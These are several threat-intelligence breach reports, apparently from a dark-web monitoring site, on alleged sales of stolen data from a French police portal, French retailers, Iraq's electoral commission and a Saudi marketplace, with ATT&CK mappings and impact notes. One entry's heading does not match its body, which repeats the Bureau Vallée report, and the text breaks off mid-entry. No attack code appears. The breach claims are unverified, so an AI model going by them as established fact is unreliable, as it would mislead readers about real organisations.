Calypsso Portal URL: https://darkwebinformer.com/french-police-file-queries-allegedly-taken-through-the-calypsso-portal/ Last updated: 2026-08-23T20:50:54.000Z Breach Report France Law Enforcement Data 8,500 EUR ## French Police File Queries Allegedly Taken Through the Calypsso Portal A forum user posting as **DumpSecNew** is selling what they describe as data drawn from **Portail Calypsso**, an access portal used to query French national police systems. The post names **TAJ, FPR, SIV and SNPC** among the files reached, and the published sample takes the form of **query results rather than a table dump**, returning identity records, family links, addresses and listed offences for the person searched. The actor attributes the data to a **cybersecurity incident in August 2026** and does not describe how access was obtained. The asking price is **8,500 euros, negotiable, in Monero**. The claim is **unverified**. Severity CRITICAL [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Price8,500 EUR PaymentMonero Systems namedFour ActorDumpSecNew ### ▣Post details TargetPortail Calypsso CountryFrance SectorLaw enforcement ListingSelling, negotiable VolumeNot clearly stated Stated sourcePortal access ObservedAug 23, 2026 ActorDumpSecNew ### !What the post claims - Data from Portail Calypsso - Incident dated August 2026 - TAJ criminal records - FPR wanted persons file - SIV vehicle registration - SNPC named among files - Schengen queries returned - FOVeS vehicle queries - Identity records with ages - Places and dates of birth - Home addresses - Parent names as filiation - Coded offence references - Query timestamps retained - Price 8,500 EUR negotiable - Monero only ### ◱Screenshot [ ![Forum listing selling data described as coming from the French Calypsso police portal, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/479823599872635987623985769873265987.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/479823599872635987623985769873265987.png) Forum post offering Calypsso portal data for sale, observed 23 August 2026\. Personal data in the sample block is redacted. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Initial access [T1078](https://attack.mitre.org/techniques/T1078/) Valid accounts Inferred The sample is portal output, not a database export, so it was produced by something able to run authorised queries. No mechanism is described. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Stated Results are drawn from several national files through one interface. - Collection [T1119](https://attack.mitre.org/techniques/T1119/) Automated collection Inferred Structured output with per file result counts and timestamps is consistent with scripted querying rather than manual lookups. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Samples are circulated through forum hosting. The route out of the environment is not described. ### ⚠Potential impact What is on offer here is not a customer list. The files named cover **judicial antecedents, wanted persons, vehicle registration and licensing**, and the sample shows them returned together against a single individual, with family links and addresses attached. Data of this kind cannot be reissued the way a password or a card number can, and the people in it are **not customers who opted into anything**. They are suspects, convicted persons, victims and witnesses, some of whom appear in these files precisely because they are at risk from someone. A working query capability against the wanted persons file also has an obvious operational value to anyone who wants to know whether they, or someone they work with, is being looked for. The wider question is **how the queries were being run and by whom**, because portal output implies credentials, and credentials imply either a compromised account or a person willing to use theirs. Neither is addressed in the post. ### iStatus Unverified This listing arrives with **a dispute already attached to it**. The actor uses the post to accuse another party of taking their samples from a different forum, altering them, and reselling the result, and states that the account involved has been banned. Whatever the merits, the practical effect is that **more than one version of this data is in circulation and at least one of them is described as modified**, which makes any sample checked against reality a weak test of the whole. The account posting is **new, with a single thread and no reputation**. Against that, the sample structure is internally consistent and matches how portal output would look, which is **a point in its favour and nothing more**. Dark Web Informer has **not retrieved the samples and is not linking them**, nor the contact address, and has redacted the personal data visible in the post. No French authority has publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=calypsso-portal-2026-08-23&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=calypsso-portal-2026-08-23&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=calypsso-portal-2026-08-23&utm%5Fcontent=footer) // Threat Intelligence ### bitbybit Studio Customer Records and AI Chat Logs Offered for Sale URL: https://darkwebinformer.com/bitbybit-studio-customer-records-and-ai-chat-logs-offered-for-sale/ Last updated: 2026-08-23T20:38:13.000Z Breach Report France Retail, supplier compromise Price by offer ## Bureau Vallée Data Allegedly Taken From a Supplier That Exported Every Store Daily A forum user posting as **misere** is selling what they describe as the customer database of **bureau-vallee.fr**, a French office supplies chain, listing **13,725,669 total records reducing to 4,819,927 unique**. The actor does not claim to have breached the retailer. They describe taking the data from **a third party that generated a daily customer export for each store and placed the files on an external server**, said to be hosted outside France without protection. They further claim to have exploited injection flaws to obtain command execution and establish **persistent access held for around a month and still working**. A 10,000 record sample is published, but **no field list is given**. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Unique records4,819,927 Total records13.73M AccessClaimed ongoing Actormisere ### ▣Post details Targetbureau-vallee.fr CountryFrance SectorOffice supplies retail ListingSelling, price by offer Volume4.82M unique of 13.73M Stated sourceThird party exporter ObservedAug 21, 2026 Actormisere ### !What the post claims - 13.73M total records - 4.82M unique records - Daily per store exports - Customer data in each file - Files placed on an FTP host - Server outside France - No protection on that host - Injection flaws on endpoints - Database command execution - Persistent access established - Access held about a month - Access claimed still live - 10,000 record sample - No field list published ### ◱Screenshot [ ![Forum listing selling an alleged Bureau Vallee customer database of 4.8 million unique records, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/25798235623875698273598726359871.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/25798235623875698273598726359871.png) Forum post offering the Bureau Vallee customer database for sale, observed 21 August 2026. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Initial access [T1199](https://attack.mitre.org/techniques/T1199/) Trusted relationship Stated Data was taken from a third party that handled exports for the retailer, not from the retailer itself. - Initial access [T1190](https://attack.mitre.org/techniques/T1190/) Exploit public facing application Stated Actor claims injection flaws on internet reachable endpoints. - Execution [T1059](https://attack.mitre.org/techniques/T1059/) Command and scripting interpreter Stated Injection was escalated to command execution against the database. - Persistence [T1505](https://attack.mitre.org/techniques/T1505/) Server software component Inferred Access described as held for around a month and still working. Mechanism not specified. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Stated A full customer export was generated for every store, every day, and written to one host. - Exfiltration [T1048](https://attack.mitre.org/techniques/T1048/) Exfiltration over alternative protocol Stated Files were retrieved from an unauthenticated FTP host outside France. ### ⚠Potential impact No fields are disclosed, so the contents remain unestablished and **scale is the only firm number**. What distinguishes this listing is the described mechanism. If a supplier really was writing **a full customer export for every store, every day, to an unprotected external server**, then the exposure is continuous rather than a single event, and the data would have been retrievable by anyone who found the host at any point in that arrangement. The claim of **persistence still working at the time of posting** means, if accurate, that collection may not have stopped. The wider concern is the same one raised by this actor's other listing hours earlier: an intermediary handling data for **a franchise network is likely to serve other clients too**, so the retailer named here may be one of several affected by a single supplier failure. ### iStatus Unverified This post supplies the **mechanism that the same actor's beauty retailer listing, published nineteen minutes later, only gestured at**, and the two should be read together. The technical account is specific and self consistent, which is a point in its favour, but it is also **entirely uncorroborated and describes the actor's own conduct**, so it may be embellished to raise the asking price. No intermediary is named anywhere in the post. A ten thousand record sample is publicly downloadable and would settle the field question, though Dark Web Informer has **not retrieved it and is not linking those mirrors**, nor the contact address. The claim is **unverified** and neither the retailer nor any supplier has publicly addressed it. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=bureau-vallee-2026-08-21&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=bureau-vallee-2026-08-21&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=bureau-vallee-2026-08-21&utm%5Fcontent=footer) // Threat Intelligence ### Bureau Vallée Customer Data Allegedly Taken From a Supplier That Exported Every Store Daily URL: https://darkwebinformer.com/bureau-vallee-customer-data-allegedly-taken-from-a-supplier-that-exported-every-store-daily/ Last updated: 2026-08-21T18:07:58.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Retail / Supplier Compromise Price By Offer ## Bureau Vallée Customer Data Allegedly Taken From a Supplier That Exported Every Store Daily A forum user posting as **misere** is selling what they describe as the customer database of **bureau-vallee.fr**, a French office supplies chain, listing **13,725,669 total records reducing to 4,819,927 unique**. The seller does not claim to have breached the retailer. They describe taking the data from **a third party that generated a daily customer export for each store and placed the files on an external server**, said to be hosted outside France without protection. They further claim to have exploited injection flaws to obtain command execution and establish **persistent access held for around a month and still working**. A 10,000 record sample is published, but **no field list is given**. The claim is **unverified**. Severity HIGH [ ![WhiteIntel sponsor banner](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Unique records4,819,927 Total records13.73M AccessClaimed ongoing Actormisere ### ▣Post details Targetbureau-vallee.fr Country![France flag](https://flagcdn.com/w40/fr.png)France SectorOffice supplies retail ListingSelling, price by offer Volume4.82M unique of 13.73M Stated sourceThird party exporter ObservedAug 21, 2026 Actormisere ### !What the post claims - 13.73M total records - 4.82M unique records - Daily per store exports - Customer data in each file - Files placed on an FTP host - Server outside France - No protection on that host - Injection flaws on endpoints - Database command execution - Persistent access established - Access held about a month - Access claimed still live - 10,000 record sample - No field list published ### ◱Screenshot [ ![Bureau Vallee France customer database sale forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/25798235623875698273598726359871.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/25798235623875698273598726359871.png) ### ⚠Potential impact No fields are disclosed, so the contents remain unestablished and **scale is the only firm number**. What distinguishes this listing is the described mechanism. If a supplier really was writing **a full customer export for every store, every day, to an unprotected external server**, then the exposure is continuous rather than a single event, and the data would have been retrievable by anyone who found the host at any point in that arrangement. The claim of **persistence still working at the time of posting** means, if accurate, that collection may not have stopped. The wider concern is the same one raised by this seller's other listing hours earlier: an intermediary handling data for **a franchise network is likely to serve other clients too**, so the retailer named here may be one of several affected by a single supplier failure. ### iStatus Unverified This post supplies the **mechanism that the same seller's beauty retailer listing, published nineteen minutes later, only gestured at**, and the two should be read together. The technical account is specific and self consistent, which is a point in its favour, but it is also **entirely uncorroborated and describes the seller's own conduct**, so it may be embellished to raise the asking price. No intermediary is named anywhere in the post. A ten thousand record sample is publicly downloadable and would settle the field question, though Dark Web Informer has **not retrieved it and is not linking those mirrors**, nor the contact address. The claim is **unverified** and neither the retailer nor any supplier has publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### French Beauty Retailer Data Allegedly Up for Sale, With the Seller Crediting a Third Party Source URL: https://darkwebinformer.com/french-beauty-retailer-data-allegedly-up-for-sale-with-the-seller-crediting-a-third-party-source/ Last updated: 2026-08-21T17:45:07.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Retail / Third Party Sourced Price By Offer ## French Beauty Retailer Data Allegedly Up for Sale, With the Seller Crediting a Third Party Source A forum user posting as **misere** is selling what they describe as the database of **beautysuccess.fr**, a French beauty and cosmetics retailer, listing **10,279,819 total records reducing to 5,169,727 unique**. A **10,000 record sample has been published free on two file hosts**. The post gives no field list, no schema and no record excerpt, so what the data actually contains is **not established**. The seller does state that the material came from **a third party who supplied them with a large volume of company data**, and points to another thread as the same source, which if accurate would mean the exposure is not limited to this one retailer. The claim is **unverified**. Severity HIGH [ ![WhiteIntel sponsor banner](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Unique records5,169,727 Total records10.28M Sample10K published Actormisere ### ▣Post details Targetbeautysuccess.fr Country![France flag](https://flagcdn.com/w40/fr.png)France SectorBeauty and cosmetics retail ListingSelling, price by offer Volume5.17M unique of 10.28M Stated sourceThird party supplier ObservedAug 21, 2026 Actormisere ### !What the post claims - 10.28M total records - 5.17M unique records - Deduplication already applied - 10,000 record sample - Two public sample mirrors - Obtained from a third party - Same source as another thread - Third party held more data - No field list published - No schema shared - No record excerpt shown - Price by offer only ### ◱Screenshot [ ![Beauty Success France customer database sale forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/7892365987623598762398756968273569872.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/7892365987623598762398756968273569872.png) ### ⚠Potential impact With no fields disclosed, the honest position is that **the contents are unknown and the scale is the only firm figure**. Five million unique records against a French retailer would represent a substantial share of its customer base, and a set of that size is valuable as a marketing and phishing list on volume alone, whatever the columns turn out to be. The **gap between ten million rows and five million unique entries suggests the source is transactional rather than a clean customer table**, since repeat purchases produce exactly that ratio. The more consequential claim is the sourcing. If the seller obtained this from an intermediary holding **data from multiple companies, then other French brands are affected by the same underlying incident**, and the retailer named here is one instance of a wider problem rather than the whole of it. ### iStatus Unverified Evidence in the thread is **thin on substance but unusually easy to test**, since a ten thousand record sample is publicly downloadable and would settle the field question immediately for anyone who retrieves it. Dark Web Informer has **not done so and is not linking those mirrors**. The record counts are the seller's own. The claim of a third party supplier is the detail worth pursuing, though the post **does not name that intermediary or describe how it was compromised**, and the cross reference points only to another forum thread. Dark Web Informer is **not reproducing the sample links, the referenced thread, or the contact address**. The claim is **unverified** and the retailer has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Iraqi Electoral Commission Data Allegedly Offered for Sale, Covering 31 Million Citizens URL: https://darkwebinformer.com/iraqi-electoral-commission-data-allegedly-offered-for-sale-covering-31-million-citizens/ Last updated: 2026-08-21T17:21:59.000Z Breach Report ![Iraq flag](https://flagcdn.com/w40/iq.png)Iraq Government / Electoral Selling ## Iraqi Electoral Commission Data Allegedly Offered for Sale, Covering 31 Million Citizens A forum user posting as **Knox** is selling what they describe as voter registration data from Iraq's **Independent High Electoral Commission**, claiming records on **31 million Iraqis including 28 million phone numbers**, with the intrusion dated to August 2026\. The published field list is comprehensive: **full name, voter card number, family record number, mother's name, exact date of birth, province and district of residence, house number, phone number, and the number and name of the centre where each person is registered to vote**. If accurate, the set would cover most of the adult population of the country. The claim is **unverified**. Severity CRITICAL [ ![WhiteIntel sponsor banner](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) People31M Phone numbers28M SourceElectoral commission ActorKnox ### ▣Post details TargetIndependent High Electoral Commission Country![Iraq flag](https://flagcdn.com/w40/iq.png)Iraq SectorElectoral administration ListingSelling, serious buyers only Volume31M people, 28M numbers Breach dateStated as August 2026 ObservedAug 21, 2026 ActorKnox, forum owner ### !Allegedly included - Full names - Voter card numbers - Family record numbers - Mothers' names - Exact dates of birth - Province of residence - District of residence - House numbers - Registration centre numbers - Registration centre names - Personal phone numbers - Registration status flags ### ◱Screenshot [ ![Iraqi Independent High Electoral Commission voter data sale forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/7982365976823598762356987298736523.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/7982365976823598762356987298736523.png) ### ⚠Potential impact Scale alone would make this severe, but the field selection is what makes it close to irreversible. **Mother's name is a standard verification question across banking and telecom in the region**, and it sits here beside an exact date of birth, an official card number and a family record number, which together satisfy most identity checks a person would ever face. None of it can be changed. With **28 million phone numbers attached to named individuals at known districts and house numbers**, fraud and SIM swap campaigns become possible at national scale. The registration centre fields carry a different kind of risk: they place each named person at a specific location and, read across a district, describe **the composition of a population in a country where political affiliation has historically drawn violence**. That makes this a physical safety matter for some individuals, not only a privacy one. ### iStatus Unverified The same caution applies as to this actor's recent hospital listing. The thread carries a **verified marker, but the poster is the forum's owner and administrator**, so the badge reflects the seller's own platform rather than independent scrutiny. The sample is structurally plausible, showing Arabic language records whose components line up with the stated fields, though a **sample proves the format rather than the volume**, and 31 million is the seller's own figure. No detail is given about how the data was obtained or from which system, and the commission has not commented. Dark Web Informer is **not reproducing the sample records, which contain named individuals with their dates of birth, card numbers and phone numbers, nor the contact routes**. The claim is **unverified**. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Saudi Automotive Marketplace Speero Allegedly Dumped in Full, Including Password and Reset Token Fields URL: https://darkwebinformer.com/saudi-automotive-marketplace-speero-allegedly-dumped-in-full-including-password-and-reset-token-fields/ Last updated: 2026-08-21T16:55:24.000Z Breach Report ![Saudi Arabia flag](https://flagcdn.com/w40/sa.png)Saudi Arabia E-commerce / Automotive Parts Price On Request ## Saudi Automotive Marketplace Speero Allegedly Dumped in Full, Including Password and Reset Token Fields A newly registered user posting as **UNC2030** is offering what they describe as a complete dump of **speero.net**, a Riyadh based marketplace for car parts and maintenance services, comprising **83 tables and 11GB of CSV data**. The user table alone is listed at **1,000,034 rows**, and its published column list includes a **password field alongside email verification tokens, password reset codes and one time account restoration tokens**. Other tables cover addresses, wallet balances and transactions, invoices, payment captures and messaging logs. The seller has posted a **free sample of the user table** and is offering lookups on request. The claim is **unverified**. Severity CRITICAL [ ![WhiteIntel sponsor banner](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) User rows1,000,034 Tables83 Volume11GB ActorUNC2030 ### ▣Post details Targetspeero.net Country![Saudi Arabia flag](https://flagcdn.com/w40/sa.png)Saudi Arabia SectorCar parts marketplace ListingSelling, price on request Volume11GB, 83 CSV tables SamplesUser table posted free ObservedAug 21, 2026 ActorUNC2030, new account ### !Allegedly included - Customer full names - Email addresses - Mobile phone numbers - Stored password field - Email verification tokens - Password reset OTP fields - Account restoration tokens - Push notification tokens - Delivery addresses - Wallet balances - Wallet transaction history - Invoices and orders - Payment capture records - Lifetime spend and margin ### ◱Screenshots [ ![Speero Saudi Arabia automotive marketplace database sale forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/923785278936587925897258976239871.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/923785278936587925897258976239871.png) [ ![Claimed table listing and row counts in the Speero dump](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/923785278936587925897258976239872.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/923785278936587925897258976239872.png) ### ⚠Potential impact The token columns are the most pressing element. A password field of unknown format is one problem, but **email verification tokens, password reset codes and one time restoration tokens can permit account takeover without touching the password at all** if any remain unexpired, and the restoration tokens in particular are designed to reverse a deletion request. Around a million customers are reportedly exposed with **names, emails, mobile numbers and delivery addresses**, which in a market where transactions run heavily through mobile messaging makes convincing fraud straightforward. Two further details raise the stakes: **wallet balances and transaction history** let an attacker rank accounts by the value sitting in them, and per customer lifetime spend and margin fields do the same commercially. Card tables appear small at a few hundred rows, so **mass card exposure looks unlikely** on the published counts. ### iStatus Unverified The seller has **no track record whatsoever**, having registered this month with a single post, which is the weakest standing of any actor in this series of listings. Against that, the evidence offered is more granular than most: a full table inventory with per file row counts and sizes that are internally consistent, plus a free sample of the user table. What the post does not establish is **how passwords are stored**, and the column list alone cannot distinguish a modern hash from something weaker. The offer of **lookups on request extends the harm to named individuals** even for those who never buy the set. Dark Web Informer is **not reproducing the sample link or the contact identity**. The claim is **unverified** and Speero has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Second French Baby Retailer Allegedly Breached the Same Morning, This Time With Building Entry Codes URL: https://darkwebinformer.com/second-french-baby-retailer-allegedly-breached-the-same-morning-this-time-with-building-entry-codes/ Last updated: 2026-08-21T16:35:15.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France E-commerce / Baby Products $1,000 USD ## Second French Baby Retailer Allegedly Breached the Same Morning, This Time With Building Entry Codes A forum user posting as **ChimeraZ** is selling what they describe as the database of **allobebe.fr**, a French retailer of baby products and childcare equipment, covering **2,175,216 records across 1,136,058 people** and spanning **orders placed from 2006 through 2026**. The set is split into an address file and an order file. Beyond names, emails, mobile and landline numbers and full addresses, the address records carry a free text delivery note field which, in the seller's own sample, contains **a building door code and interphone instructions**. The asking price is **$1,000 in Monero**, with **2,000 records already published free across nine file hosts**. The claim is **unverified**. Severity CRITICAL [ ![WhiteIntel sponsor banner](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) People1,136,058 Records2.18M History2006 to 2026 ActorChimeraZ ### ▣Post details Targetallobebe.fr Country![France flag](https://flagcdn.com/w40/fr.png)France SectorBaby and childcare retail ListingSelling, XMR only Volume850MB, two JSON files Samples2,000 records, 9 mirrors ObservedAug 21, 2026 ActorChimeraZ ### !Allegedly included - Customer full names - Titles and salutations - Email addresses - Mobile phone numbers - Landline numbers - Full street addresses - Address complements - Building entry codes - Interphone instructions - Postal codes and cities - Order numbers and totals - Purchased product details - Payment method type - Two decades of history ### ◱Screenshot [ ![Allobebe France baby products customer database sale forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2798356982765987235698726359871.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2798356982765987235698726359871.png) ### ⚠Potential impact The delivery note field is what lifts this above an ordinary retail breach. Customers routinely write down **the door code, the floor, which interphone button to press and where a parcel can be left**, and the seller's own sample shows exactly that. Paired with a full address and the fact that the purchases identify **a household with an infant**, the result is physical access information about homes with young children, which is not something a family can revoke without changing the code for the whole building. The **twenty year span** compounds it in an unusual way: people who ordered in 2006 are unlikely to remember the retailer holds their details, many have since moved, and children recorded then are adults now. Two contactable phone numbers per person and a full order history also make **delivery and refund pretexts easy to construct**. ### iStatus Unverified This is the **second French baby goods retailer listed by the same actor within the same hour**, the other being a comparable set of around 960,000 people. The two posts share a contact identity and a common structure, and both sit outside the numbered platform series this actor is separately running. Whether the pairing reflects a shared supplier, a shared hosting arrangement or simply one seller working through a sector is **not stated anywhere in either post and should not be assumed**. Record counts are the seller's own, and the gap between lines and people reflects repeat orders. Dark Web Informer is **not reproducing the sample mirrors, the contact route, or the names, addresses, phone numbers and entry code** shown in the post. The claim is **unverified** and the retailer has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Nearly a Million French Customers of a Baby Goods Retailer Allegedly Exposed With Delivery Addresses URL: https://darkwebinformer.com/nearly-a-million-french-customers-of-a-baby-goods-retailer-allegedly-exposed-with-delivery-addresses/ Last updated: 2026-08-21T16:16:39.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France E-commerce / Baby Products $600 USD ## Nearly a Million French Customers of a Baby Goods Retailer Allegedly Exposed With Delivery Addresses A forum user posting as **ChimeraZ** is selling what they describe as the database of **madeinbebe.com**, a French retailer of products for babies and children, comprising **1,359,546 invoice lines covering 960,106 people** in 1.45GB of JSON. The published sample shows complete invoice records pairing a **named customer with their billing and delivery address, the items bought, and the order value**. No card numbers appear, only the payment type. The asking price is **$600 in Monero**, and the seller has separately published **a thousand sample records free across eight file hosts**, meaning a portion of the data is already circulating at no cost. The claim is **unverified**. Severity HIGH [ ![WhiteIntel sponsor banner](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) People960,106 Invoice lines1.36M Asking price$600 ActorChimeraZ ### ▣Post details Targetmadeinbebe.com Country![France flag](https://flagcdn.com/w40/fr.png)France SectorBaby and child retail ListingSelling, XMR only Volume1.45GB JSON Samples1,000 records, 8 mirrors ObservedAug 21, 2026 ActorChimeraZ ### !Allegedly included - Customer full names - Billing addresses - Delivery addresses - Postal codes and cities - Invoice numbers and dates - Order numbers - Purchased item descriptions - Product barcode references - Quantities and unit prices - Order totals and tax - Payment method type - Invoice PDF filenames - Internal reference numbers - Shipping dates ### ◱Screenshot [ ![Made in Bebe France baby products customer database sale forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/978239596872527368959876235987623987.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/978239596872527368959876235987623987.png) ### ⚠Potential impact No passwords or card numbers appear in the sample, so the direct financial risk is limited. The sensitivity lies in what the purchases imply. A retailer of this kind produces, in effect, **a list of French households with infants or young children, at confirmed delivery addresses, with the dates those purchases were made**. That is a category of information most parents would not expect to be inferable from a shopping record, and it is not something an affected family can change the way they would a password. For fraud, the pairing of a **real invoice number, real items and a real address** makes delivery and refund pretexts unusually convincing, and the invoice filenames suggest matching PDF documents exist. The scale also makes this attractive as a marketing list. Because a thousand records are already **published free across multiple hosts**, some exposure exists regardless of whether the full set ever sells. ### iStatus Unverified This appears to be **separate from the numbered platform series the same actor is running**, which reached its eleventh release the previous day: there is no release number, no shared platform named, and this one is priced rather than free. The sample is a single well formed invoice record consistent with an order export, which supports the structure without confirming the volume, and the **counts of lines and of people are the seller's own**. The distinction between the two figures is worth preserving, since roughly 400,000 of the lines represent repeat orders rather than additional individuals. Dark Web Informer is **not reproducing the sample mirrors, the contact route, or the customer name and address** shown in the post. The claim is **unverified** and the retailer has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Bergerat Rent Data Allegedly Leaked in Eleventh Release, With the Shared Platform Now Named URL: https://darkwebinformer.com/bergerat-rent-data-allegedly-leaked-in-eleventh-release-with-the-shared-platform-now-named/ Last updated: 2026-08-20T20:42:24.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Business Software / Equipment Rental Free Download ## Bergerat Rent Data Allegedly Leaked in Eleventh Release, With the Shared Platform Now Named A forum user posting as **ChimeraZ** has published what they describe as the database of **bergerat-rent.com**, 